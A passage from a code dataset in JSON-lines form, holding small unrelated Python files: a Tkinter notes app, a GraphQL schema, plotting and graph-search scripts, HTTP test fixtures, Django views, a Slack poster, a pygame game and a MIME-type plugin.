text=f'{otvet[i][0]}' + ':' + ' ' + f'{otvet[i][2]}')\n label.grid(column=0, row=row)\n button = Button(root, text=\"Создать новую заметку!\", command=go_in_notes)\n button.grid(column=0, row=row + 1)\n except:\n return False\n\n\ndef user_registration():\n data = json.dumps(txt.get(), ensure_ascii=False)\n data = json.loads(str(data))\n\n with open('data.json', 'r') as filik:\n dict_data = json.load(filik)\n dict_data[f'{txt.get()}'] = ['авторизация успешно пройдена']\n\n with open('data.json', 'w') as file:\n json.dump(dict_data, file, ensure_ascii=False, indent=3)\n registration_successfully_completed()\n\n\ndef check_for_saved_users():\n with open('data.json', 'r') as file:\n a = file.read()\n a = json.loads(a)\n check = 0\n for element in a:\n if element == txt.get():\n registration_successfully_completed()\n break\n if element != txt.get():\n check += 1\n if check == len(a):\n user_registration()\n\n\nroot = Tk()\nroot.title('Авторизация в заметки')\nroot.geometry('450x450')\n\nmenu_bar = Menu(root)\nfile_menu = Menu(menu_bar)\n\nmessagebox.showinfo('Информация',\n 'Привет, вам нужно будет ввести ваш персональный никнейм, это нужно для предоставления именно ваших заметок!')\nlbl = Label(root, text='Введите свой никнейм!')\nlbl.grid(column=0, row=0)\ntxt = Entry(root, width=15)\ntxt.grid(column=1, row=0)\ntxt.focus()\nbtn = Button(root, text=\"ОК!\", command=check_for_saved_users)\nbtn.grid(column=2, row=2)\n\nroot.config(menu=menu_bar)\nroot.mainloop()\n","repo_name":"AppleIpx/python-notes","sub_path":"functions_for_the_notes.py","file_name":"functions_for_the_notes.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"45749032740","text":"import graphene\nimport graphql_jwt\n\n# import links.schema\n# import links.schema_relay\nimport users.schema\nimport rooms.schema\nimport msgs.schema\n\nclass Query(\n users.schema.Query,\n rooms.schema.Query,\n msgs.schema.Query,\n # links.schema.Query,\n # links.schema_relay.RelayQuery,\n graphene.ObjectType,\n):\n pass\n\n\nclass Mutation(\n users.schema.Mutation,\n rooms.schema.Mutation,\n msgs.schema.Mutation,\n # links.schema.Mutation,\n # links.schema_relay.RelayMutation,\n graphene.ObjectType,\n):\n\n login = graphql_jwt.ObtainJSONWebToken.Field()\n verify_token = graphql_jwt.Verify.Field()\n refresh_token = graphql_jwt.Refresh.Field()\n\n\nschema = graphene.Schema(query=Query, mutation=Mutation)\n","repo_name":"rajzik/docker-webapp","sub_path":"server/webapp/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"27144460030","text":"#!/usr/bin/env python\n\nimport argparse\nimport csv\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nplt.style.use('dark_background')\n\ndef read_csv(filename, has_header=True):\n rows = []\n with open(filename, 'r') as f:\n reader = csv.reader(f, delimiter=',')\n if has_header:\n header = tuple(map(str.rstrip, next(reader)))\n for line in reader:\n rows.append(tuple(map(float, line)))\n if not has_header:\n header = ('',) * len(rows[0])\n return header, rows\n\ndef read_gnuplot(filename):\n rows = []\n with open(filename, 'r') as f:\n for line in f:\n split_line = line.split()\n rows.append(tuple(map(float, split_line)))\n return [''] * len(rows[0]), rows\n\ndef plot_time_series(csv_filename, out_filename, ylim=None, title=None,\n ticks=None, nrows=1, case=''):\n styles = [\n {'color': '#00ffff', 'linewidth': 2},\n {'color': '#ff00ff', 'linewidth': 2},\n {'color': '#00cfcf', 'linewidth': 2},\n {'color': '#cf00cf', 'linewidth': 2},\n {'color': '#00afaf', 'linewidth': 2},\n {'color': '#af00af', 'linewidth': 2},\n {'color': '#008f8f', 'linewidth': 2},\n {'color': '#8f008f', 'linewidth': 2},\n {'color': '#006f6f', 'linewidth': 2},\n {'color': '#6f006f', 'linewidth': 2},\n ]\n header, rows = read_csv(csv_filename)\n series = list(map(np.array, zip(*rows)))\n t = series[0]\n\n if case == 'eigenvalues':\n # series[1:] = [np.sign(s) * np.log10(np.abs(s) + 1) for s in series[1:]]\n series[1:] = [np.log10(np.abs(s) + 1) for s in series[1:]]\n\n fig, axes = plt.subplots(nrows=nrows, sharex=True)\n\n if nrows == 1:\n axes = [axes]\n plot_multiple(axes[0], t, zip(styles, header[1:], series[1:]))\n elif nrows == 2:\n plot_multiple(axes[0], t, zip(styles[:-1], header[1:-1], series[1:-1]))\n plot_multiple(axes[1], t, [(styles[-1], header[-1], series[-1])])\n\n axes[0].set_title(title)\n axes[0].set_ylim(ylim)\n axes[-1].set_xlabel(header[0])\n for ax in axes:\n ax.legend(framealpha=0.9, loc='upper right')\n if ticks is not None:\n axes[-1].set_xlim((0.0, ticks[-1] + 0.5))\n axes[-1].set_xticks(ticks)\n fig.savefig(out_filename, dpi=300)\n\ndef plot_multiple(ax, x, it):\n for i, (style, label, data) in enumerate(it):\n mask = ~np.isnan(data)\n x_ = x[mask]\n data = data[mask]\n ax.plot(x_, data, label=label, zorder=-i, **style)\n\ndef main():\n parser = argparse.ArgumentParser(description='Plot.')\n parser.add_argument('infile', action='store')\n parser.add_argument('outfile', action='store')\n parser.add_argument('--time-series', action='store_true', default=False)\n parser.add_argument('--eigenvalues', action='store_true', default=False)\n parser.add_argument('--ticks', action='store', default=None)\n parser.add_argument('--nrows', action='store', type=int, default=1)\n parser.add_argument('--title', action='store', default='')\n args = parser.parse_args()\n\n if args.ticks is not None:\n args.ticks = [x\n for xs in read_csv(args.ticks, has_header=False)[1]\n for x in xs]\n args.ticks = [round(x, 1) for x in args.ticks]\n # print('Using ticks override: {}'.format(args.ticks))\n\n if args.time_series:\n plot_time_series(\n csv_filename=args.infile,\n out_filename=args.outfile,\n nrows=args.nrows,\n ticks=args.ticks,\n title=args.title)\n\n if args.eigenvalues:\n plot_time_series(\n csv_filename=args.infile,\n out_filename=args.outfile,\n nrows=1,\n case='eigenvalues',\n ticks=args.ticks,\n title=r'Energy 
eigenvalues')\n\nmain()\n","repo_name":"YodaEmbedding/experiments","sub_path":"fortran/phys395_hw5/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"24881268882","text":"from collections import deque\n\n# Definition who is seller from persons\ndef person_is_seller(name):\n return name[-1] == 'm'\n\n# Implementation breadth-first search algorithm\ndef breadth_search(name):\n search_queue = deque()\n search_queue += graph[\"You\"]\n searched = []\n while search_queue:\n person = search_queue.popleft()\n if not person in searched:\n if person_is_seller(person):\n print(person + \" is a mango seller!\")\n return True\n else:\n search_queue += graph[person]\n searched.append(person)\n return False\n\n# Define friends graph\ngraph = {}\ngraph[\"You\"] = [\"Alice\", \"Bob\", \"Claire\"]\ngraph[\"Bob\"] = [\"Anuj\", \"Peggy\"]\ngraph[\"Alice\"] = [\"Peggy\"]\ngraph[\"Claire\"] = [\"Thom\", \"Jonny\"]\ngraph[\"Anuj\"] = []\ngraph[\"Peggy\"] = []\ngraph[\"Thom\"] = []\ngraph[\"Jonny\"] = []\n\nif (not breadth_search(\"You\")):\n print(\"Mango sellers not found\")\n","repo_name":"grawitti/py_samples","sub_path":"grokking_algo/breadth_first_search.py","file_name":"breadth_first_search.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"11308723246","text":"import unittest\nfrom copy import deepcopy\ntry:\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\n\n\nclass BaseWebRichObjectTestCase(unittest.TestCase):\n url = 'http://example.com'\n\n def _get_mock_attrs(self):\n func = getattr(self, self._testMethodName)\n return getattr(func, 'mock_attrs', None)\n\n def setUp(self):\n mock_attrs = self._get_mock_attrs()\n if mock_attrs is not None:\n self.patch = patch('web_rich_object.api.urlopen', **mock_attrs)\n self.patch.start()\n\n def tearDown(self):\n if self._get_mock_attrs() is not None:\n self.patch.stop()\n\nHTML_RESPONSE_INFO = {\n 'dict': {\n 'accept-ranges': 'bytes',\n 'cache-control': 'max-age=900',\n 'connection': 'close',\n 'content-length': '59593',\n 'content-type': 'text/html; charset=UTF-8',\n 'date': 'Sat, 17 Dec 2016 20:52:48 GMT',\n 'expires': 'Sat, 17 Dec 2016 21:06:53 GMT',\n 'server': 'Apache',\n 'x-adobe-content': 'AEM',\n 'x-ua-compatible': 'IE=11'\n },\n 'encodingheader': None,\n 'fp': None,\n 'headers': [\n 'Server: Apache\\r\\n',\n 'X-UA-Compatible: IE=11\\r\\n',\n 'X-Adobe-Content: AEM\\r\\n',\n 'Accept-Ranges: bytes\\r\\n',\n 'Cache-Control: max-age=900\\r\\n',\n 'Expires: Sat, 17 Dec 2016 21:06:53 GMT\\r\\n',\n 'Content-Type: text/html; charset=UTF-8\\r\\n',\n 'Date: Sat, 17 Dec 2016 20:52:48 GMT\\r\\n',\n 'Content-Length: 59593\\r\\n',\n 'Content-Language: PT\\r\\n',\n 'Connection: close\\r\\n'\n ],\n 'maintype': 'text',\n 'plist': ['charset=UTF-8'],\n 'plisttext': '; charset=UTF-8',\n 'seekable': 0,\n 'startofbody': None,\n 'startofheaders': None,\n 'status': '',\n 'subtype': 'html',\n 'type': 'text/html',\n 'typeheader': 'text/html; charset=UTF-8',\n 'unixfrom': ''\n}\n\nPDF_RESPONSE_INFO = deepcopy(HTML_RESPONSE_INFO)\nPDF_RESPONSE_INFO['maintype'] = 'application'\nPDF_RESPONSE_INFO['type'] = 'application'\nPDF_RESPONSE_INFO['subtype'] = 'pdf'\n\nIMAGE_RESPONSE_INFO = {\n 'dict': {\n 'cache-control': 'public, max-age=315360000',\n 'cf-cache-status': 'MISS',\n 'cf-ray': '312f513938bc6224-LIS',\n 'connection': 'close',\n 'content-length': '12141',\n 'content-type': 'image/png',\n 'date': 'Sun, 18 Dec 2016 02:52:11 GMT',\n 'etag': '\"63045090f550f37601888be65832f3e6\"',\n 'expires': 'Wed, 16 Dec 2026 02:52:11 GMT',\n 'last-modified': 'Tue, 18 Aug 2015 14:43:38 GMT',\n 'server': 'cloudflare-nginx',\n 'set-cookie': '__cfduid=dd3b9155f31aac201599f9a237f5457e41482029531; expires=Mon, 18-Dec-17 02:52:11 GMT; path=/; domain=.imgur.com; HttpOnly',\n 'vary': 'Accept-Encoding',\n 'x-amz-storage-class': 'REDUCED_REDUNDANCY',\n 'x-amz-version-id': '4fxFOV0qAhyGrAviTh37dKrZfC5qu2hL'\n },\n 'encodingheader': None,\n 'fp': None,\n 'headers': [\n 'Date: Sun, 18 Dec 2016 02:52:11 GMT\\r\\n',\n 'Content-Type: image/png\\r\\n',\n 'Content-Length: 12141\\r\\n',\n 'Connection: close\\r\\n',\n 'Set-Cookie: __cfduid=dd3b9155f31aac201599f9a237f5457e41482029531; expires=Mon, 18-Dec-17 02:52:11 GMT; path=/; domain=.imgur.com; HttpOnly\\r\\n',\n 'Cache-Control: public, max-age=315360000\\r\\n',\n 'ETag: \"63045090f550f37601888be65832f3e6\"\\r\\n',\n 'Expires: Wed, 16 Dec 2026 02:52:11 GMT\\r\\n',\n 'Last-Modified: Tue, 18 Aug 2015 14:43:38 GMT\\r\\n',\n 'x-amz-storage-class: REDUCED_REDUNDANCY\\r\\n',\n 'x-amz-version-id: 4fxFOV0qAhyGrAviTh37dKrZfC5qu2hL\\r\\n',\n 'CF-Cache-Status: MISS\\r\\n',\n 'Vary: Accept-Encoding\\r\\n',\n 'Server: cloudflare-nginx\\r\\n',\n 'CF-RAY: 312f513938bc6224-LIS\\r\\n'\n ],\n 'maintype': 'image',\n 'plist': [],\n 'plisttext': '',\n 'seekable': 
0,\n 'startofbody': None,\n 'startofheaders': None,\n 'status': '',\n 'subtype': 'png',\n 'type': 'image/png',\n 'typeheader': 'image/png',\n 'unixfrom': ''\n}\n\nUNKNOW_RESPONSE_INFO = deepcopy(HTML_RESPONSE_INFO)\ndel PDF_RESPONSE_INFO['headers'][UNKNOW_RESPONSE_INFO['headers'].index('Content-Language: PT\\r\\n')]\n","repo_name":"ZuluPro/web-rich-object","sub_path":"web_rich_object/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"73353952115","text":"from valetapp.models.Booking.booking import Booking\nfrom valetapp.models.Users.customer import Customer\nfrom valetapp.models.Store.chainstore import ChainStore\nfrom valetapp.models.Valet.valet import Valet\nfrom valetapp.models.Users.membershiptype import MembershipType\nfrom valetapp.models.Users.staff import Staff\nfrom valetapp.views.Visitor.concreteVisitor import ConcreteVisitor\nfrom django.shortcuts import render\n\n\ndef getVisitor(request):\n bookings = Booking.objects.all()\n customers = Customer.objects.all()\n stores = ChainStore.objects.all()\n valets = Valet.objects.all()\n membershipTypes = MembershipType.objects.all()\n staffs = Staff.objects.all()\n visitor = ConcreteVisitor()\n\n total_sum = 0\n customer_emails_for_promotions = []\n store_names = []\n valet_types = []\n membership_types = []\n staff_members = []\n\n for booking in bookings:\n total_sum += booking.accept(visitor)\n for customer in customers:\n customer_emails_for_promotions.append(customer.accept(visitor))\n for store in stores:\n store_names.append(store.accept(visitor))\n for valet in valets:\n valet_types.append(valet.accept(visitor))\n for membershipType in membershipTypes:\n membership_types.append(membershipType.accept(visitor))\n for staff in staffs:\n staff_members.append(staff.accept(visitor))\n\n money_made_by_each_store = get_money_made_by_each_store(bookings, stores)\n\n export_to_CSV_object = {\n 'total_sum': total_sum,\n 'customers': customer_emails_for_promotions,\n 'store_names': store_names,\n 'valet_types': valet_types,\n 'membership_types': membership_types,\n 'staff_members': staff_members,\n 'money_made_by_each_store': money_made_by_each_store\n }\n\n return render(request, \"Booking/booking_list.html\", {'export_data': export_to_CSV_object})\n\n\ndef get_money_made_by_each_store(bookings, stores):\n money_made_by_store = []\n for store in stores:\n store_total = 0\n for booking in bookings:\n if(booking.get_store() == store):\n store_total += booking.get_price()\n money_made_by_store.append((store.get_name(), store_total))\n return money_made_by_store\n","repo_name":"dylank09/ValetSystem","sub_path":"valetproject/valetapp/views/Visitor/exportToCSV.py","file_name":"exportToCSV.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"70301885233","text":"from django.shortcuts import render, render_to_response, redirect\nfrom HandBook.models import Class, Group, SubGroup, Company, HandBook\nfrom Elements.models import Element\nfrom Profile.models import Profile\nimport json\nfrom django.http.response import HttpResponse\nfrom django.template.context_processors import csrf\nimport pandas as pd\nfrom HandBook.export_Excel import export_df_to_excel\nfrom HandBook.export_PDF import export_df_to_pdf\nimport os\n\n# ----------------------------------- FUNCTIONS FOR CREATED HANDBOOK -------------------------\n\n\ndef remove_files(request):\n # filepath = 'QualificationWork/static/ExportFiles/'\n filepath = 'static/ExportFiles/'\n excel_file = filepath + request.user.username + '_excel_file.xlsx'\n pdf_file = filepath + request.user.username + '_pdf_file.pdf'\n os.remove(excel_file)\n os.remove(pdf_file)\n return HttpResponse('200')\n\n\ndef element_parameters(element, fields):\n fields_list = []\n for field in fields:\n parameter = element.__getattribute__(field)\n if not hasattr(parameter, 'name'):\n fields_list.append(parameter)\n else:\n fields_list.append(parameter.name)\n return fields_list\n\n\ndef create_dataframe(required_elements, elements_indexes=False):\n if elements_indexes:\n elements_ids = []\n fields = [field.name for field in Element._meta.get_fields()]\n df = pd.DataFrame(columns=fields)\n for index_element, element in enumerate(required_elements):\n df.loc[index_element] = element_parameters(element, fields)\n elements_ids.append(element.id)\n df.drop(['id'], axis=1, inplace=True)\n return df, elements_ids\n else:\n fields = [field.name for field in Element._meta.get_fields()]\n df = pd.DataFrame(columns=fields)\n for index_element, element in enumerate(required_elements):\n df.loc[index_element] = element_parameters(element, fields)\n df.drop(['id'], axis=1, inplace=True)\n return df\n\n\ndef create_handbook(request):\n args = {}\n args.update(csrf(request))\n args.update({\"username\": request.user.username})\n # file_path = 'QualificationWork/static/ExportFiles/'\n file_path = 'static/ExportFiles/'\n links = {\"pdf\": file_path + str(request.user.username) + '_pdf_file',\n \"excel\": file_path + str(request.user.username) + '_excel_file'}\n if request.POST:\n required_elements = [element for element in Element.objects.all() if request.POST.get(\"3_\" + str(element.id)) is not None]\n if len(required_elements) != 0:\n df, elements_ids = create_dataframe(required_elements, True)\n request.user.profile.set_coins(request.POST.get(\"coins\"))\n request.user.profile.save()\n handbook = HandBook(user=request.user,\n handbook_name=request.POST.get(\"handbook_name\"))\n handbook.set_elements(elements_ids)\n handbook.save()\n export_df_to_pdf(df, filename=links.get(\"pdf\"))\n export_df_to_excel(df, filename=links.get(\"excel\"))\n args.update({\"elements\": df.values.tolist()})\n args.update({\"columns\": df.columns})\n args.update({\"links\": links})\n return render_to_response(\"createdHandbookExtension.html\", args)\n else:\n return render_to_response(\"createdHandbookExtension.html\", args)\n else:\n elements_ids = HandBook.objects.get(id=request.GET['handbook']).get_elements_ids()\n elements = Element.objects.filter(pk__in=elements_ids)\n df = create_dataframe(elements)\n export_df_to_pdf(df, filename=links.get(\"pdf\"))\n export_df_to_excel(df, filename=links.get(\"excel\"))\n args.update({\"elements\": df.values.tolist()})\n df_columns_names = ['Название', 'Компания', 'Класс', 'Группа', 
'Подгруппа', 'Средняя наработка на отказ',\n 'Средний срок сохраняемости', 'Средний ресурс (ч)', 'Среднее время восстановления (ч)',\n 'Дополнительная Информация', 'Дата добавления', 'Подтверждающая ссылка']\n args.update({\"columns\": df_columns_names})\n args.update({\"links\": links})\n return render_to_response(\"createdHandbookExtension.html\", args)\n\n\ndef delete_handbook(request):\n handbook_id = request.GET[\"id\"]\n handbook = HandBook.objects.get(id=handbook_id)\n handbook.delete()\n return redirect(\"/personal_account\")\n\n# ----------------------------------- FUNCTIONS FOR CREATING HANDBOOK -------------------------\n\n\ndef create_unique_id(object):\n models = [Class, Group, SubGroup, Element]\n for index, model in enumerate(models):\n if isinstance(object, model):\n return str(index) + \"_\" + str(object.id)\n\n\ndef choose_elements(request):\n args = {}\n args.update(csrf(request))\n classes = [{\"id\": create_unique_id(_class), \"name\": _class.name} for _class in Class.objects.all()]\n args.update({\"classes\": classes})\n args.update({\"username\": request.user.username})\n args.update({\"user\": request.user})\n return render_to_response(\"handbookCreatingExtension.html\", args)\n\n\ndef get_data_for_removing(id, model):\n if model is Class:\n groups = [object for object in Group.objects.filter(class_id=Class.objects.get(id=id))]\n subgroups = sum([[object for object in SubGroup.objects.filter(group_id=group)] for group in groups], [])\n elements = sum([[object for object in Element.objects.filter(Subgroup_id=subgroup)] for subgroup in subgroups], [])\n return [create_unique_id(object) for object in (groups + subgroups + elements)]\n if model is Group:\n subgroups = [object for object in SubGroup.objects.filter(group_id=Group.objects.get(id=id))]\n elements = sum([[object for object in Element.objects.filter(Subgroup_id=subgroup)] for subgroup in subgroups], [])\n return [create_unique_id(object) for object in (subgroups + elements)]\n if model is SubGroup:\n return [create_unique_id(object) for object in Element.objects.filter(Subgroup_id=SubGroup.objects.get(id=id))]\n\n\ndef collect_data(request):\n data = []\n models = [Class, Group, SubGroup, Element]\n model_id, object_id = str(request.GET[\"id\"]).split(\"_\")\n model = models[int(model_id)]\n event = int(request.GET[\"event\"])\n if event == 0:\n if model is Class:\n data = [{\"id\": create_unique_id(object), \"name\": object.name} for object in Group.objects.filter(class_id=Class.objects.get(id=object_id))]\n if model is Group:\n data = [{\"id\": create_unique_id(object), \"name\": object.name} for object in SubGroup.objects.filter(group_id=Group.objects.get(id=object_id))]\n if model is SubGroup:\n data = [{\"id\": create_unique_id(object), \"name\": object.name} for object in Element.objects.filter(Subgroup=SubGroup.objects.get(id=object_id))]\n else:\n data = get_data_for_removing(object_id, model)\n return HttpResponse(json.dumps(data))\n","repo_name":"Belket/QualificationWork","sub_path":"HandBook/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"28114062398","text":"# Kirjoita ohjelma, joka kysyy käyttäjältä viiden kaupungin nimet yksi kerrallaan (käytä for-toistorakennetta nimien kysymiseen) ja tallentaa ne listarakenteeseen. \n# Lopuksi ohjelma tulostaa kaupunkien nimet yksi kerrallaan allekkain samassa järjestyksessä kuin ne syötettiin. \n# käytä for-toistorakennetta nimien kysymiseen ja for/in toistorakennetta niiden läpikäymiseen.\n\ncities = []\n\nfor i in range(5):\n city = input(\"Kirjoita kaupungin nimi: \")\n cities.append(city)\n\nfor city in cities:\n print(city)","repo_name":"kassu11/AMK-python","sub_path":"module05-homework/5.4-kaupunkien-kysely.py","file_name":"5.4-kaupunkien-kysely.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"33638020436","text":"import json\nimport slack # module is called slackclient\n\n# Local image taken from https://ccsearch.creativecommons.org/photos/a376def5-1f22-4e28-b2f0-8cf67398afa8\n\n# Load global config\nwith open(\"../network_config/slack.json\") as slack_f:\n slack_settings = json.load(slack_f)\n\nOATH = slack_settings[\"OAUTH_TOKEN\"]\nWEBHOOK_URL = slack_settings[\"WEBHOOK\"]\nUSEWEBHOOK = slack_settings[\"USE_WEBHOOK\"] # set 1 in ../network_config/slack.json if you can't use OATH (no graph though)\nSLACKCHANNEL = slack_settings[\"CHANNEL\"]\n\nwith open(\"blocks.json\", \"rt\") as block_f:\n data = json.load(block_f)\n\nclient = slack.WebClient(token=OATH)\n\nclient.files_upload(\n channels=SLACKCHANNEL,\n file=\"slacks.jpg\",\n title=\"Local File\"\n)\nclient.chat_postMessage(\n channel=SLACKCHANNEL,\n blocks=data\n)\n","repo_name":"FrancisCrickInstitute/network_modules","sub_path":"_slack_post.py","file_name":"_slack_post.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"21640744176","text":"import pygame\nimport math\nfrom pygame.locals import *\nfrom pygame.math import *\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 800\nWHITE = [255, 255, 255]\n\ndef rot_center(image, rect, angle):\n \"\"\"rotate an image while keeping its center\"\"\"\n rot_image = pygame.transform.rotate(image, angle)\n rot_rect = rot_image.get_rect(center=rect.center)\n return rot_image,rot_rect\n\nclass Car(pygame.sprite.Sprite):\n \n def __init__(self, color):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('car_'+color+'.png').convert_alpha()\n self.image = pygame.transform.scale(self.image, (int(SCREEN_WIDTH/20), int(SCREEN_HEIGHT/20)))\n self.image = pygame.transform.rotate(self.image, 90)\n self.original_image = self.image \n \n self.mask = pygame.mask.from_surface(self.image)\n \n self.rect = self.image.get_rect()\n self.rect[0] = 50 \n self.rect[1] = 100 \n \n self.position = Vector2((self.rect[0], self.rect[1]))\n self.direction = Vector2(1, 0)\n \n self.speed = 0\n self.angle_speed = 0\n self.angle = 0\n #self.image, self.rect = rot_center(self.image, self.rect, 90)\n \n def update(self):\n if(self.angle_speed != 0):\n self.direction.rotate_ip(self.angle_speed)\n self.angle += self.angle_speed\n self.image = pygame.transform.rotate(self.original_image, -self.angle)\n self.rect = self.image.get_rect(center = self.rect.center)\n self.position += self.direction * self.speed\n self.rect.center = self.position\n \n #print(pygame.Surface.get_at((self.rect[0], self.rect[1])))\nclass Background(pygame.sprite.Sprite):\n \n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('pista.png')\n self.image = pygame.transform.scale(self.image, (SCREEN_WIDTH, SCREEN_HEIGHT))\n #self.mask = pygame.mask.from_threshold(self.image, pygame.Color('black'))\n self.mask = pygame.mask.from_surface(self.image)\n self.rect = self.image.get_rect()\ndef clear_callback(surf, rect):\n color = 255, 255, 255\n surf.fill(color, rect)\n\n\npygame.init()\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\nscreen.fill(WHITE)\n\nbackground_group = pygame.sprite.Group()\nBACKGROUND = Background()\nbackground_group.add(BACKGROUND)\n\ncar_group = pygame.sprite.Group()\ncar = Car('red')\ncar_group.add(car)\n\n\n\nclock = pygame.time.Clock()\nwhile True:\n clock.tick(60)\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n car.speed += 1\n elif event.key == pygame.K_DOWN:\n car.speed -= 1\n elif event.key == pygame.K_LEFT:\n car.angle_speed = -3\n elif event.key == pygame.K_RIGHT:\n car.angle_speed = 3\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n car.angle_speed = 0\n elif event.key == pygame.K_RIGHT:\n car.angle_speed = 0\n clear_callback(screen, car.rect)\n screen.blit(BACKGROUND.image, (0, 0))\n car_group.update()\n car_group.draw(screen)\n\n\n \n pygame.display.update()\n \n\n if(pygame.sprite.groupcollide(car_group, background_group, False, False, pygame.sprite.collide_mask)):\n print(\"GAME OVER\")\n break\n\npygame.quit()\n","repo_name":"Iwazo8700/race_ia","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"10246170641","text":"# -*- coding:utf-8 -*-\n\n\nfrom collections import deque\nfrom graph import Undigraph\n\n\ndef print_vertex_trace(prev, s, t, level=1):\n if prev[t] != -1 and t != s:\n print_vertex_trace(prev, s, prev[t], level+1)\n if level == 1:\n print(\"%d\" % t)\n else:\n print(\"%d -> \" % t, end=\"\")\n\n\ndef bfs(graph, s, t):\n if s == t:\n return \n queue = deque()\n prev = [ -1 ] * len(graph)\n visited = [False] * len(graph)\n visited[s] = True\n queue.append(s)\n while len(queue) > 0:\n vertex = queue.popleft()\n for adj_v in graph[vertex]:\n if not visited[adj_v]:\n prev[adj_v] = vertex\n if adj_v == t:\n return prev\n visited[adj_v] = True\n queue.append(adj_v)\n return prev\n\n\ndef recursive_dfs(graph, s, t):\n prev = [-1] * len(graph)\n visited = [False] * len(graph)\n found = False\n def rdfs(s, t):\n nonlocal found\n if s == t:\n found = True\n return \n for v in graph[s][::-1]:\n if not visited[v]:\n visited[v] = True\n prev[v] = s\n rdfs(v, t)\n rdfs(s, t)\n return prev\n\n\ndef dfs(graph, s, t):\n prev = [-1] * len(graph)\n visited = [False] * len(graph)\n stk = [s]\n visited[s] = True\n while len(stk) > 0:\n vertex = stk.pop()\n for v in graph[vertex]:\n if not visited[v]:\n prev[v] = vertex\n if t == v:\n return prev\n visited[v] = True\n stk.append(v)\n \n\nif __name__ == '__main__':\n g = Undigraph(8)\n g.add_edge(0, 1)\n g.add_edge(0, 3)\n g.add_edge(1, 2)\n g.add_edge(1, 4)\n g.add_edge(2, 5)\n g.add_edge(3, 4)\n g.add_edge(4, 5)\n g.add_edge(4, 6)\n g.add_edge(5, 7)\n g.add_edge(6, 7)\n print(g)\n bfs_prev = bfs(g, 0, 7)\n print_vertex_trace(bfs_prev, 0, 7)\n dfs_prev = recursive_dfs(g, 0, 7)\n print_vertex_trace(dfs_prev, 0, 7) \n dfs2_prev = dfs(g, 0, 7)\n print_vertex_trace(dfs2_prev, 0, 7) \n","repo_name":"free-free/algorithm","sub_path":"graph/graph_search.py","file_name":"graph_search.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"}
+{"seq_id":"70266341873","text":"from typing import Union, Optional\n\nimport magic\n\nfrom d20.Manual.BattleMap import FileObject\nfrom d20.Manual.Templates import (NPCTemplate,\n registerNPC)\nfrom d20.Manual.Facts import (MimeTypeFact, # type: ignore\n Fact)\n\n\n# Process basic information to initially populate fact table\n@registerNPC(\n name=\"MimeTypeNPC\",\n description=(\"This NPC provides the mimetype of an object.\"),\n creator=\"Mike Goffin\",\n version=\"0.1\",\n engine_version=\"0.1\"\n)\nclass MimeTypeNPC(NPCTemplate):\n def __init__(self, **kwargs: str) -> None:\n super().__init__(**kwargs)\n\n def handleData(self, **kwargs: FileObject) -> None:\n if 'data' not in kwargs:\n raise RuntimeError(\"Expected 'data' in arguments\")\n\n dataObj: FileObject = kwargs['data']\n data: Union[bytes, bytearray, memoryview] = dataObj.data\n try:\n mimetype: Optional[str] = magic.from_buffer(data, mime=True)\n except Exception:\n mimetype = None\n if mimetype:\n mimetype = mimetype.split(';')[0]\n else:\n mimetype = None\n try:\n filetype: Optional[str] = magic.from_buffer(data)\n except Exception:\n filetype = 'Unknown'\n mimetypeFact: Fact = MimeTypeFact(\n mimetype=mimetype,\n filetype=filetype,\n parentObjects=[dataObj.id]\n )\n self.console.addFact(mimetypeFact)\n","repo_name":"MITRECND/d20","sub_path":"d20/NPCS/MimeTypeNPC.py","file_name":"MimeTypeNPC.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"39"}
